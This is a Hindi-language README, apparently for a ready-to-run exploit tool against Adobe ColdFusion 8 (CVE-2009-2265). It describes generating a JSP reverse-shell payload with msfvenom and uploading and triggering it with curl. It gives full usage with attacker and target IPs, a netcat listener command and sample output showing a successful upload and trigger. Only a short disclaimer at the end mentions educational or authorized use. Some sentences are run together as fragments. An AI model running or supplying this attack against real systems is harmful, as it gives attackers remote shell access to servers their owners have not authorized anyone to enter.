
Adobe ColdFusion 8 - रिमोट कमांड निष्पादन (RCE)
यह शोषण Adobe ColdFusion 8 (CVE-2009-2265) में एक ज्ञात कमजोरी को लक्षित करता है। यह एक दुर्भावनापूर्ण JSP पेलोड अपलोड करके दूरस्थ कमांड निष्पादन (RCE) को सक्षम करता है जो एक रिवर्स शेल कनेक्शन स्थापित करता है।
msfvenom का उपयोग करके JSP पेलोड उत्पन्न करता है।इस शोषण का उपयोग करने के लिए, आपको निम्नलिखित की आवश्यकता है:
./CVE-2009-2265 -l <LHOST> -p <LPORT> -r <RHOST> -q <RPORT>
-l <LHOST>: स्थानीय हमलावर IP (जैसे, 10.10.16.5)।-p <LPORT>: रिवर्स शेल के लिए स्थानीय हमलावर पोर्ट (जैसे, 9001)।-r <RHOST>: दूरस्थ लक्ष्य IP (जैसे, 10.10.10.11)।-q <RPORT>: दूरस्थ लक्ष्य पोर्ट जहाँ ColdFusion चल रहा है (जैसे, 8500)।./CVE-2009-2265 -l 10.10.16.5 -p 9001 -r 10.10.10.11 -q 8500
अपने हमलावर मशीन पर एक लिसनर प्रारंभ करें:
nc -lnvp 9001
उपयुक्त तर्कों के साथ शोषण चलाएँ।
एक बार निष्पादित होने पर, पेलोड आपके लिसनर से वापस जुड़ जाएगा।
msfvenom का उपयोग करके एक दुर्भावनापूर्ण JSP पेलोड उत्पन्न करती है। पेलोड निर्दिष्ट LHOST और LPORT पर एक रिवर्स शेल आरंभ करता है।msfvenom पेलोड निर्माण के लिए।curl फ़ाइल अपलोड और पेलोड ट्रिगर करने के लिए।nc (Netcat) रिवर्स शेल कनेक्शन सुनने के लिए।[+] Generating JSP reverse shell payload...
[+] Payload saved as 'abcd1234-5678-90ef-ghij-1234567890ab.jsp'.
[+] Uploading the payload to the target...
[+] Server response:
<script type="text/javascript">
window.parent.OnUploadCompleted(0, "/userfiles/file/abcd1234-5678-90ef-ghij-1234567890ab.jsp", "abcd1234-5678-90ef-ghij-1234567890ab.txt", "0");
</script>
[+] Waiting for the Netcat listener to start on port 9001...
[+] Netcat listener detected running on port 9001!
[+] Attempting to trigger the payload...
[+] Payload triggered successfully. Check your listener for the reverse shell.
[+] Cleaning up local files...
[+] Done!
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। इसका उपयोग उन सिस्टम पर करें जिनके आप मालिक हैं या जिनके परीक्षण की स्पष्ट अनुमति है। उन सिस्टम पर इस शोषण का अनधिकृत उपयोग जिनके आप मालिक नहीं हैं, अवैध और अनैतिक है।
[0xDTC] द्वारा विकसित।